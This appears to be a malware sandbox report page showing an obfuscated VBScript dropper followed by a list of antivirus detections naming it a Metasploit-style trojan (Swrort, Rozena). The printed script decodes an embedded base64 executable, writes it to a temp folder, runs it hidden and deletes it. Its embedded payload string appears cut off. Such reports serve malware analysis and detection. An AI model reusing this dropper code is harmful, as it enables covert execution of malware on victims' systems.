popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function nhnBxtsNb(fDCGJzHLbErbn)
VkPMfwODPcwSpi = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
fDCGJzHLbErbn & "</B64DECODE>"
Set bOXGPqQfhio = CreateObject("MSXML2.DOMDocument.3.0")
bOXGPqQfhio.LoadXML(VkPMfwODPcwSpi)
nhnBxtsNb = bOXGPqQfhio.selectsinglenode("B64DECODE").nodeTypedValue
set bOXGPqQfhio = nothing
End Function
Function NaiZKAWvwSIRtk()
yPehMiiSPIN = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABFa2j4AAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Dim MRjApysbCom
Set MRjApysbCom = CreateObject("Scripting.FileSystemObject")
Dim FFmfMoBxpTxMn
Dim UoEPslpNNyRW
Set FFmfMoBxpTxMn = MRjApysbCom.GetSpecialFolder(2)
UoEPslpNNyRW = FFmfMoBxpTxMn & "\" & MRjApysbCom.GetTempName()
MRjApysbCom.CreateFolder(UoEPslpNNyRW)
RGnWstbBCLTwdP = UoEPslpNNyRW & "\" & "aQRCnwPkjpQxYq.exe"
Dim ASDjglYOGWeQ
Set ASDjglYOGWeQ = CreateObject("Wscript.Shell")
YkBpkWtom = nhnBxtsNb(yPehMiiSPIN)
Set KYNmnlqrDxFqK = CreateObject("ADODB.Stream")
KYNmnlqrDxFqK.Type = 1
KYNmnlqrDxFqK.Open
KYNmnlqrDxFqK.Write YkBpkWtom
KYNmnlqrDxFqK.SaveToFile RGnWstbBCLTwdP, 2
ASDjglYOGWeQ.run RGnWstbBCLTwdP, 0, true
MRjApysbCom.DeleteFile(RGnWstbBCLTwdP)
MRjApysbCom.DeleteFolder(UoEPslpNNyRW)
End Function
NaiZKAWvwSIRtk
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.4!c
ClamAV Vbs.Backdoor.Msfvenom_Payload-9955777-0
CMC Clean
CAT-QuickHeal Trojan.VBS.33100
ALYac VB:Trojan.VBS.Dropper.AG
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-Script.Save.c5b409aa
K7AntiVirus Clean
K7GW Clean
Baidu JS.Trojan-Downloader.Agent.xk
VirIT Clean
Cyren VBS/Agent.AJU!Eldorado
Symantec VBS.Heur.SNIC
ESET-NOD32 Win32/Rozena.ED
TrendMicro-HouseCall Clean
Avast BV:Dowloader-A [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender VB:Trojan.VBS.Dropper.AG
NANO-Antivirus Trojan.Script.Agent.fosjzx
ViRobot Clean
MicroWorld-eScan VB:Trojan.VBS.Dropper.AG
Tencent Win32.Trojan.Expkit.Bdhl
Sophos Troj/Swrort-AL
F-Secure Malware.HTML/ExpKit.Gen2
DrWeb JS.Muldrop.457
VIPRE VB:Trojan.VBS.Dropper.AG
TrendMicro HEUR_VBS.O1
McAfee-GW-Edition VBS/MPreter
FireEye VB:Trojan.VBS.Dropper.AG
Emsisoft VB:Trojan.VBS.Dropper.AG (B)
GData VB:Trojan.VBS.Dropper.AG
Jiangmin Clean
Avira HTML/ExpKit.Gen2
MAX malware (ai score=85)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium TrojWare.VBS.TrojanDropper.Agent.NJA@833icd
Arcabit VB:Trojan.VBS.Dropper.AG
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft TrojanDropper:VBS/Ploty.A
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee VBS/MPreter
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:JqyfiJ1QMlQ)
Yandex Clean
Ikarus Trojan.Win32.Swrort
MaxSecure Clean
Fortinet VBS/Rozena.ED!tr
BitDefenderTheta Clean
AVG BV:Dowloader-A [Trj]
Panda Clean
No IRMA results available.